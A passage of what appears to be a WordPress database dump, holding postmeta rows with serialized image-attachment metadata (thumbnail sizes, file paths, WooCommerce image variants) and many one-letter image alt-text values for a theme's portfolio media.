";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1742,4333,'_wp_attachment_image_alt','a'),(1743,4335,'_wp_attached_file','2018/01/h9-portfolio-2.jpg'),(1744,4335,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:347;s:6:\"height\";i:210;s:4:\"file\";s:26:\"2018/01/h9-portfolio-2.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h9-portfolio-2-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h9-portfolio-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h9-portfolio-2-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h9-portfolio-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"h9-portfolio-2-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"h9-portfolio-2-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h9-portfolio-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1745,4335,'_wp_attachment_image_alt','a'),(1746,4340,'_wp_attached_file','2018/03/breadcrumb-slika3.jpg'),(1747,4340,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:300;s:4:\"file\";s:29:\"2018/03/breadcrumb-slika3.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"breadcrumb-slika3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"breadcrumb-slika3-600x94.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"breadcrumb-slika3-300x47.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"breadcrumb-slika3-1024x160.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-768x120.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"breadcrumb-slika3-1536x240.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-550x300.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"breadcrumb-slika3-1100x300.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-550x300.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"breadcrumb-slika3-1100x300.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"breadcrumb-slika3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"breadcrumb-slika3-600x94.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"breadcrumb-slika3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1748,4340,'_wp_attachment_image_alt','a'),(1749,4266,'_wp_attachment_image_alt','l'),(1750,4267,'_wp_attachment_image_alt','a'),(1751,4268,'_wp_attachment_image_alt','o'),(1752,4269,'_wp_attachment_image_alt','a'),(1753,4270,'_wp_attachment_image_alt','a'),(1754,4275,'_wp_attachment_image_alt','a'),(1755,4277,'_wp_attachment_image_alt','a'),(1756,4277,'portfolio_single_masonry_image_size','small-box'),(1757,4277,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(1758,4278,'_wp_attachment_image_alt','a'),(1759,4278,'portfolio_single_masonry_image_size','large-height'),(1760,4278,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(1761,4280,'_wp_attachment_image_alt','a'),(1762,4280,'portfolio_single_masonry_image_size','large-height'),(1763,4280,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(1764,4282,'_wp_attachment_image_alt','a'),(1765,4282,'portfolio_single_masonry_image_size','small-box'),(1766,4282,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(1767,4283,'_wp_attachment_image_alt','a'),(1768,4284,'_wp_attachment_image_alt','a'),(1769,4284,'portfolio_single_masonry_image_size','small-box'),(1770,4284,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(1771,4333,'_wp_attachment_image_alt','a'),(1772,4335,'_wp_attachment_image_alt','a'),(1773,4340,'_wp_attachment_image_alt','a'),(1774,2975,'_wp_attachment_image_alt','a'),(1775,2981,'_wp_attachment_image_alt','h'),(1776,2988,'_wp_attachment_image_alt','a'),(1777,2992,'_wp_attachment_image_alt','a'),(1778,3007,'_wp_attachment_image_alt','o'),(1779,3061,'_wp_attachment_image_alt','a'),(1780,3112,'_wp_attachment_image_alt','o'),(1781,3113,'_wp_attachment_image_alt','o'),(1782,3115,'_wp_attachment_image_alt','o'),(1783,3116,'_wp_attachment_image_alt','o'),(1784,3186,'_wp_attachment_image_alt','a'),(1785,1079,'_wp_attachment_image_alt','o'),(1786,1081,'_wp_attachment_image_alt','o'),(1787,1082,'_wp_attachment_image_alt','o'),(1788,611,'_wp_attachment_image_alt','o'),(1789,1083,'_wp_attachment_image_alt','o'),(1790,631,'_wp_attachment_image_alt','o'),(1791,1084,'_wp_attachment_image_alt','o'),(1792,642,'_wp_attachment_image_alt','o'),(1793,1120,'_wp_attachment_image_alt','a'),(1794,1121,'_wp_attachment_image_alt','a'),(1795,643,'_wp_attachment_image_alt','o'),(1796,1122,'_wp_attachment_image_alt','a'),(1797,644,'_wp_attachment_image_alt','o'),(1798,1124,'_wp_attachment_image_alt','a'),(1799,645,'_wp_attachment_image_alt','a'),(1800,1125,'_wp_attachment_image_alt','a'),(1801,670,'_wp_attachment_image_alt','a'),(1802,1126,'_wp_attachment_image_alt',''),(1803,708,'_wp_attachment_image_alt','o'),(1804,1128,'_wp_attachment_image_alt','a'),(1805,709,'_wp_attachment_image_alt','o'),(1806,1129,'_wp_attachment_image_alt','a'),(1807,710,'_wp_attachment_image_alt','o'),(1808,1130,'_wp_attachment_image_alt','a'),(1809,712,'_wp_attachment_image_alt','o'),(1810,1132,'_wp_attachment_image_alt','a'),(1811,3187,'_wp_attachment_image_alt','a'),(1812,713,'_wp_attachment_image_alt','o'),(1813,1133,'_wp_attachment_image_alt','a'),(1814,3188,'_wp_attachment_image_alt','a'),(1815,1134,'_wp_attachment_image_alt','a'),(1816,724,'_wp_attachment_image_alt','a'),(1817,3189,'_wp_attachment_image_alt','a'),(1818,1143,'_wp_attachment_image_alt','o'),(1819,754,'_wp_attachment_image_alt','a'),(1820,3222,'_wp_attachment_image_alt','o'),(1821,1148,'_wp_attachment_image_alt','o'),(1822,3223,'_wp_attachment_image_alt',''),(1823,1151,'_wp_attachment_image_alt','a'),(1824,764,'_wp_attachment_image_alt','a'),(1825,3944,'_wp_attachment_image_alt','a'),(1826,18,'_wp_attachment_image_alt','o'),(1827,3224,'_wp_attachment_image_alt',''),(1828,1152,'_wp_attachment_image_alt','a'),(1829,2514,'_wp_attachment_image_alt','o'),(1830,3951,'_wp_attachment_image_alt','a'),(1831,774,'_wp_attachment_image_alt','o'),(1832,52,'_wp_attachment_image_alt','o'),(1833,3227,'_wp_attachment_image_alt','o'),(1834,3952,'_wp_attachment_image_alt','a'),(1835,1153,'_wp_attachment_image_alt',''),(1836,2515,'_wp_attachment_image_alt','o'),(1837,3229,'_wp_attachment_image_alt',''),(1838,3399,'_wp_attachment_image_alt','o'),(1839,3953,'_wp_attachment_image_alt','a'),(1840,798,'_wp_attachment_image_alt','o'),(1841,73,'_wp_attachment_image_alt','o'),(1842,1156,'_wp_attachment_image_alt','q'),(1843,3231,'_wp_attachment_image_alt','o'),(1844,1817,'_wp_attachment_image_alt','a'),(1845,3969,'_wp_attachment_image_alt','s'),(1846,3400,'_wp_attachment_image_alt','o'),(1847,811,'_wp_attachment_image_alt','o'),(1848,3232,'_wp_attachment_image_alt',''),(1849,1157,'_wp_attachment_image_alt','q'),(1850,3401,'_wp_attachment_image_alt','o'),(1851,1818,'_wp_attachment_image_alt','a'),(1852,3973,'_wp_attachment_image_alt','a'),(1853,88,'_wp_attachment_image_alt','o'),(1854,3234,'_wp_attachment_image_alt',''),(1855,838,'_wp_attachment_image_alt','a'),(1856,3402,'_wp_attachment_image_alt','o'),(1857,4029,'_wp_attachment_image_alt','f'),(1858,1158,'_wp_attachment_image_alt','q'),(1859,1827,'_wp_attachment_image_alt','o'),(1860,3235,'_wp_attachment_image_alt','o'),(1861,839,'_wp_attachment_image_alt','a'),(1862,4048,'_wp_attachment_image_alt','s'),(1863,91,'_wp_attachment_image_alt','o'),(1864,3403,'_wp_attachment_image_alt','o'),(1865,1301,'_wp_attachment_image_alt',''),(1866,1162,'_wp_attachment_image_alt','a'),(1867,3236,'_wp_attachment_image_alt',''),(1868,1919,'_wp_attachment_image_alt','o'),(1869,861,'_wp_attachment_image_alt','o'),(1870,4049,'_wp_attachment_image_alt','j'),(1871,3405,'_wp_attachment_image_alt',''),(1872,112,'_wp_attachment_image_alt','f'),(1873,1434,'_wp_attachment_image_alt','q'),(1874,1163,'_wp_attachment_image_alt','a'),(1875,3238,'_wp_attachment_image_alt','o'),(1876,2002,'_wp_attachment_image_alt','o'),(1877,862,'_wp_attachment_image_alt','o'),(1878,4076,'_wp_attachment_image_alt','j'),(1879,3406,'_wp_attachment_image_alt','h'),(1880,129,'_wp_attachment_image_alt','a'),(1881,3261,'_wp_attachment_image_alt','o'),(1882,1164,'_wp_attachment_image_alt','a'),(1883,1435,'_wp_attachment_image_alt','q'),(1884,863,'_wp_attachment_image_alt','o'),(1885,4108,'_wp_attachment_image_alt','s'),(1886,2005,'_wp_attachment_image_alt','a'),(1887,3262,'_wp_attachment_image_alt','o'),(1888,1171,'_wp_attachment_image_alt','a'),(1889,3412,'_wp_attachment_image_alt','a'),(1890,130,'_wp_attachment_image_alt','a'),(1891,1445,'_wp_attachment_image_alt','a'),(1892,864,'_wp_attachment_image_alt','o'),(1893,4109,'_wp_attachment_image_alt','m'),(1894,2027,'_wp_attachment_image_alt','a'),(1895,3414,'_wp_attachment_image_alt','a'),(1896,1456,'_wp_attachment_image_alt','a'),(1897,4110,'_wp_attachment_image_alt','m'),(1898,2055,'_wp_attachment_image_alt','a'),(1899,3415,'_wp_attachment_image_alt','a'),(1900,1457,'_wp_attachment_image_alt','a'),(1901,4111,'_wp_attachment_image_alt','m'),(1902,3446,'_wp_attachment_image_alt','o'),(1903,2061,'_wp_attachment_image_alt','a'),(1904,4112,'_wp_attachment_image_alt','m'),(1905,1458,'_wp_attachment_image_alt','a'),(1906,3447,'_wp_attachment_image_alt','o'),(1907,3263,'_wp_attachment_image_alt',''),(1908,904,'_wp_attachment_image_alt','o'),(1909,4113,'_wp_attachment_image_alt','m'),(1910,2115,'_wp_attachment_image_alt','a'),(1911,1172,'_wp_attachment_image_alt','a'),(1912,154,'_wp_attachment_image_alt','o'),(1913,3264,'_wp_attachment_image_alt',''),(1914,2129,'_wp_attachment_image_alt','a'),(1915,4178,'_wp_attachment_image_alt','a'),(1916,1468,'_wp_attachment_image_alt','a'),(1917,905,'_wp_attachment_image_alt','o'),(1918,1173,'_wp_attachment_image_alt','a'),(1919,3448,'_wp_attachment_image_alt','o'),(1920,164,'_wp_attachment_image_alt','a'),(1921,3265,'_wp_attachment_image_alt','o'),(1922,2135,'_wp_attachment_image_alt','a'),(1923,4179,'_wp_attachment_image_alt','a'),(1924,1471,'_wp_attachment_image_alt','o'),(1925,906,'_wp_attachment_image_alt','a'),(1926,3449,'_wp_attachment_image_alt','o'),(1927,1177,'_wp_attachment_image_alt','a'),(1928,166,'_wp_attachment_image_alt','o'),(1929,3266,'_wp_attachment_image_alt','o'),(1930,2139,'_wp_attachment_image_alt','a'),(1931,4180,'_wp_attachment_image_alt','a'),(1932,1472,'_wp_attachment_image_alt','o'),(1933,912,'_wp_attachment_image_alt','a'),(1934,3274,'_wp_attachment_image_alt','a'),(1935,4181,'_wp_attachment_image_alt','a'),(1936,913,'_wp_attachment_image_alt','o'),(1937,3275,'_wp_attachment_image_alt','o'),(1938,4188,'_wp_attachment_image_alt','a'),(1939,939,'_wp_attachment_image_alt','o'),(1940,3276,'_wp_attachment_image_alt','a'),(1941,3451,'_wp_attachment_image_alt','o'),(1942,4189,'_wp_attachment_image_alt','a'),(1943,2168,'_wp_attachment_image_alt','a'),(1944,1473,'_wp_attachment_image_alt','a'),(1945,941,'_wp_attachment_image_alt','o'),(1946,1178,'_wp_attachment_image_alt','a'),(1947,3278,'_wp_attachment_image_alt','o'),(1948,184,'_wp_attachment_image_alt','a'),(1949,3452,'_wp_attachment_image_alt','o'),(1950,4206,'_wp_attachment_image_alt','o'),(1951,2169,'_wp_attachment_image_alt','a'),(1952,1492,'_wp_attachment_image_alt','o'),(1953,942,'_wp_attachment_image_alt','o'),(1954,1179,'_wp_attachment_image_alt','a'),(1955,3279,'_wp_attachment_image_alt',''),(1956,194,'_wp_attachment_image_alt','o'),(1957,3453,'_wp_attachment_image_alt','o'),(1958,4208,'_wp_attachment_image_alt',''),(1959,2170,'_wp_attachment_image_alt','a'),(1960,1496,'_wp_attachment_image_alt','o'),(1961,943,'_wp_attachment_image_alt','o'),(1962,3280,'_wp_attachment_image_alt','o'),(1963,1182,'_wp_attachment_image_alt','a'),(1964,245,'_wp_attachment_image_alt','a'),(1965,4211,'_wp_attachment_image_alt','a'),(1966,3295,'_wp_attachment_image_alt','a'),(1967,944,'_wp_attachment_image_alt','o'),(1968,3454,'_wp_attachment_image_alt',''),(1969,1183,'_wp_attachment_image_alt','a'),(1970,2171,'_wp_attachment_image_alt','a'),(1971,4225,'_wp_attachment_image_alt','o'),(1972,246,'_wp_attachment_image_alt','a'),(1973,1498,'_wp_attachment_image_alt','o'),(1974,947,'_wp_attachment_image_alt','o'),(1975,3310,'_wp_attachment_image_alt','o'),(1976,3505,'_wp_attachment_image_alt','o'),(1977,1184,'_wp_attachment_image_alt','a'),(1978,2173,'_wp_attachment_image_alt','a'),(1979,4228,'_wp_attachment_image_alt','a'),(1980,1520,'_wp_attachment_image_alt','a'),(1981,261,'_wp_attachment_image_alt','o'),(1982,950,'_wp_attachment_image_alt','o'),(1983,3311,'_wp_attachment_image_alt',''),(1984,3509,'_wp_attachment_image_alt','o'),(1985,2175,'_wp_attachment_image_alt','a'),(1986,1187,'_wp_attachment_image_alt','a'),(1987,4232,'_wp_attachment_context','site-icon'),(1988,289,'_wp_attachment_image_alt','o'),(1989,1525,'_wp_attachment_image_alt','a'),(1990,982,'_wp_attachment_image_alt','o'),(1991,3312,'_wp_attachment_image_alt',''),(1992,3510,'_wp_attachment_image_alt','o'),(1993,2176,'_wp_attachment_image_alt','a'),(1994,1188,'_wp_attachment_image_alt','a'),(1995,4234,'_wp_attachment_image_alt','a'),(1996,291,'_wp_attachment_image_alt','a'),(1997,1536,'_wp_attachment_image_alt','a'),(1998,999,'_wp_attachment_image_alt','a'),(1999,3313,'_wp_attachment_image_alt','o'),(2000,3511,'_wp_attachment_image_alt','o'),(2001,2177,'_wp_attachment_image_alt','a'),(2002,1190,'_wp_attachment_image_alt','a'),(2003,4238,'_wp_attachment_image_alt','a'),(2004,308,'_wp_attachment_image_alt','o'),(2005,1547,'_wp_attachment_image_alt','a'),(2006,3314,'_wp_attachment_image_alt',''),(2007,1003,'_wp_attachment_image_alt','a'),(2008,3512,'_wp_attachment_image_alt','o'),(2009,2200,'_wp_attachment_image_alt','O'),(2010,1194,'_wp_attachment_image_alt','a'),(2011,4241,'_wp_attachment_image_alt','a'),(2012,343,'_wp_attachment_image_alt','o'),(2013,3315,'_wp_attachment_image_alt','o'),(2014,1548,'_wp_attachment_image_alt','a'),(2015,2201,'_wp_attachment_image_alt','o'),(2016,3513,'_wp_attachment_image_alt','a'),(2017,1004,'_wp_attachment_image_alt','a'),(2018,1195,'_wp_attachment_image_alt','a'),(2019,4242,'_wp_attachment_image_alt','a'),(2020,352,'_wp_attachment_image_alt','o'),(2021,3316,'_wp_attachment_image_alt',''),(2022,1549,'_wp_attachment_image_alt','a'),(2023,2202,'_wp_attachment_image_alt','o'),(2024,3514,'_wp_attachment_image_alt','a'),(2025,1196,'_wp_attachment_image_alt','a'),(2026,1013,'_wp_attachment_image_alt','a'),(2027,4243,'_wp_attachment_image_alt','a'),(2028,369,'_wp_attachment_image_alt','a'),(2029,3346,'_wp_attachment_image_alt','a'),(2030,1550,'_wp_attachment_image_alt','a'),(2031,2234,'_wp_attachment_image_alt','o'),(2032,3515,'_wp_attachment_image_alt','a'),(2033,1203,'_wp_attachment_image_alt','o'),(2034,1016,'_wp_attachment_image_alt','a'),(2035,4244,'_wp_attachment_image_alt','a'),(2036,385,'_wp_attachment_image_alt','a'),(2037,3368,'_wp_attachment_image_alt','a'),(2038,1552,'_wp_attachment_image_alt','z'),(2039,2239,'_wp_attachment_image_alt','o'),(2040,3516,'_wp_attachment_image_alt','a'),(2041,1204,'_wp_attachment_image_alt','o'),(2042,1020,'_wp_attachment_image_alt','a'),(2043,390,'_wp_attachment_image_alt','o'),(2044,2269,'_wp_attachment_image_alt','o'),(2045,393,'_wp_attachment_image_alt','o'),(2046,3369,'_wp_attachment_image_alt','a'),(2047,1553,'_wp_attachment_image_alt','a'),(2048,3526,'_wp_attachment_image_alt','a'),(2049,1211,'_wp_attachment_image_alt','o'),(2050,2278,'_wp_attachment_image_alt','o'),(2051,1021,'_wp_attachment_image_alt','o'),(2052,394,'_wp_attachment_image_alt','a'),(2053,3376,'_wp_attachment_image_alt','a'),(2054,1554,'_wp_attachment_image_alt','a'),(2055,3531,'_wp_attachment_image_alt','a'),(2056,1216,'_wp_attachment_image_alt','o'),(2057,2285,'_wp_attachment_image_alt','o'),(2058,1028,'_wp_attachment_image_alt','o'),(2059,395,'_wp_attachment_image_alt','a'),(2060,3377,'_wp_attachment_image_alt','a'),(2061,1560,'_wp_attachment_image_alt','a'),(2062,3536,'_wp_attachment_image_alt','a'),(2063,1277,'_wp_attachment_image_alt','o'),(2064,1029,'_wp_attachment_image_alt','o'),(2065,2377,'_wp_attachment_image_alt','o'),(2066,396,'_wp_attachment_image_alt','a'),(2067,3396,'_wp_attachment_image_alt','o'),(2068,1565,'_wp_attachment_image_alt','a'),(2069,3546,'_wp_attachment_image_alt','o'),(2070,1283,'_wp_attachment_image_alt','o'),(2071,2387,'_wp_attachment_image_alt','o'),(2072,397,'_wp_attachment_image_alt','a'),(2073,1043,'_wp_attachment_image_alt','o'),(2074,3397,'_wp_attachment_image_alt','o'),(2075,3551,'_wp_attachment_image_alt','a'),(2076,1566,'_wp_attachment_image_alt','a'),(2077,2438,'_wp_attachment_image_alt','o'),(2078,1295,'_wp_attachment_image_alt','a'),(2079,398,'_wp_attachment_image_alt','a'),(2080,3398,'_wp_attachment_image_alt','o'),(2081,3556,'_wp_attachment_image_alt',''),(2082,1074,'_wp_attachment_image_alt','o'),(2083,1567,'_wp_attachment_image_alt','a'),(2084,2440,'_wp_attachment_image_alt','o'),(2085,1296,'_wp_attachment_image_alt','a'),(2086,404,'_wp_attachment_image_alt','a'),(2087,3562,'_wp_attachment_image_alt','o'),(2088,2446,'_wp_attachment_image_alt','o'),(2089,408,'_wp_attachment_image_alt','a'),(2090,2447,'_wp_attachment_image_alt','o'),(2091,409,'_wp_attachment_image_alt','a'),(2092,2448,'_wp_attachment_image_alt','o'),(2093,429,'_wp_attachment_image_alt','a'),(2094,1572,'_wp_attachment_image_alt','a'),(2095,3565,'_wp_attachment_image_alt','o'),(2096,2460,'_wp_attachment_image_alt','o'),(2097,431,'_wp_attachment_image_alt','a'),(2098,1297,'_wp_attachment_image_alt',''),(2099,1574,'_wp_attachment_image_alt','s'),(2100,1075,'_wp_attachment_image_alt',''),(2101,2473,'_wp_attachment_image_alt','a'),(2102,3566,'_wp_attachment_image_alt',''),(2103,432,'_wp_attachment_image_alt','a'),(2104,1299,'_wp_attachment_image_alt','a'),(2105,1576,'_wp_attachment_image_alt','k'),(2106,2474,'_wp_attachment_image_alt','a'),(2107,1076,'_wp_attachment_image_alt',''),(2108,3570,'_wp_attachment_image_alt','a'),(2109,453,'_wp_attachment_image_alt','o'),(2110,1578,'_wp_attachment_image_alt','d'),(2111,1300,'_wp_attachment_image_alt','a'),(2112,2475,'_wp_attachment_image_alt','a'),(2113,3583,'_wp_attachment_image_alt','a'),(2114,470,'_wp_attachment_image_alt','o'),(2115,2476,'_wp_attachment_image_alt','a'),(2116,541,'_wp_attachment_image_alt','o'),(2117,2477,'_wp_attachment_image_alt','a'),(2118,553,'_wp_attachment_image_alt','a'),(2119,1584,'_wp_attachment_image_alt','o'),(2120,3584,'_wp_attachment_image_alt','a'),(2121,2478,'_wp_attachment_image_alt','a'),(2122,556,'_wp_attachment_image_alt','a'),(2123,2479,'_wp_attachment_image_alt','a'),(2124,558,'_wp_attachment_image_alt','a'),(2125,3586,'_wp_attachment_image_alt','s'),(2126,1631,'_wp_attachment_image_alt','a'),(2127,2480,'_wp_attachment_image_alt','a'),(2128,3626,'_wp_attachment_image_alt','a'),(2129,566,'_wp_attachment_image_alt','o'),(2130,2481,'_wp_attachment_image_alt','a'),(2131,3715,'_wp_attachment_image_alt','o'),(2132,1077,'_wp_attachment_image_alt','o'),(2133,1633,'_wp_attachment_image_alt','a'),(2134,570,'_wp_attachment_image_alt','a'),(2135,3728,'_wp_attachment_image_alt','o'),(2136,2482,'_wp_attachment_image_alt',''),(2137,1715,'_wp_attachment_image_alt','o'),(2138,3730,'_wp_attachment_image_alt','o'),(2139,591,'_wp_attachment_image_alt','o'),(2140,2483,'_wp_attachment_image_alt','a'),(2141,1078,'_wp_attachment_image_alt',''),(2142,3732,'_wp_attachment_image_alt','o'),(2143,592,'_wp_attachment_image_alt','a'),(2144,1742,'_wp_attachment_image_alt','o'),(2145,2484,'_wp_attachment_image_alt','a'),(2146,3736,'_wp_attachment_image_alt',''),(2147,593,'_wp_attachment_image_alt','o'),(2148,1746,'_wp_attachment_image_alt','o'),(2149,3757,'_wp_attachment_image_alt','o'),(2150,2485,'_wp_attachment_image_alt','a'),(2151,610,'_wp_attachment_image_alt','o'),(2152,3778,'_wp_attachment_image_alt','o'),(2153,2486,'_wp_attachment_image_alt',''),(2154,1803,'_wp_attachment_image_alt','a'),(2155,3901,'_wp_attachment_image_alt','a'),(2156,2508,'_wp_attachment_image_alt','o'),(2157,1804,'_wp_attachment_image_alt','a'),(2158,3935,'_wp_attachment_image_alt','a'),(2159,2509,'_wp_attachment_image_alt','o'),(2160,3936,'_wp_attachment_image_alt','a'),(2161,2510,'_wp_attachment_image_alt','o'),(2162,3937,'_wp_attachment_image_alt','a'),(2163,1805,'_wp_attachment_image_alt','a'),(2164,3941,'_wp_attachment_image_alt','a'),(2165,1806,'_wp_attachment_image_alt','a'),(2166,3943,'_wp_attachment_image_alt','a'),(2167,1807,'_wp_attachment_image_alt','a'),(2168,1808,'_wp_attachment_image_alt','a'),(2169,1809,'_wp_attachment_image_alt','a'),(2170,1810,'_wp_attachment_image_alt','a'),(2171,1811,'_wp_attachment_image_alt','a'),(2172,1812,'_wp_attachment_image_alt','a'),(2173,1813,'_wp_attachment_image_alt','a'),(2174,1814,'_wp_attachment_image_alt','a'),(2175,1815,'_wp_attachment_image_alt','a'),(2176,1816,'_wp_attachment_image_alt','a'),(2177,2516,'_wp_attached_file','2018/02/h3-slide2-graphic5.png'),(2178,2516,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:452;s:6:\"height\";i:351;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic5.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-300x233.png\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-452x300.png\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide2-graphic5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";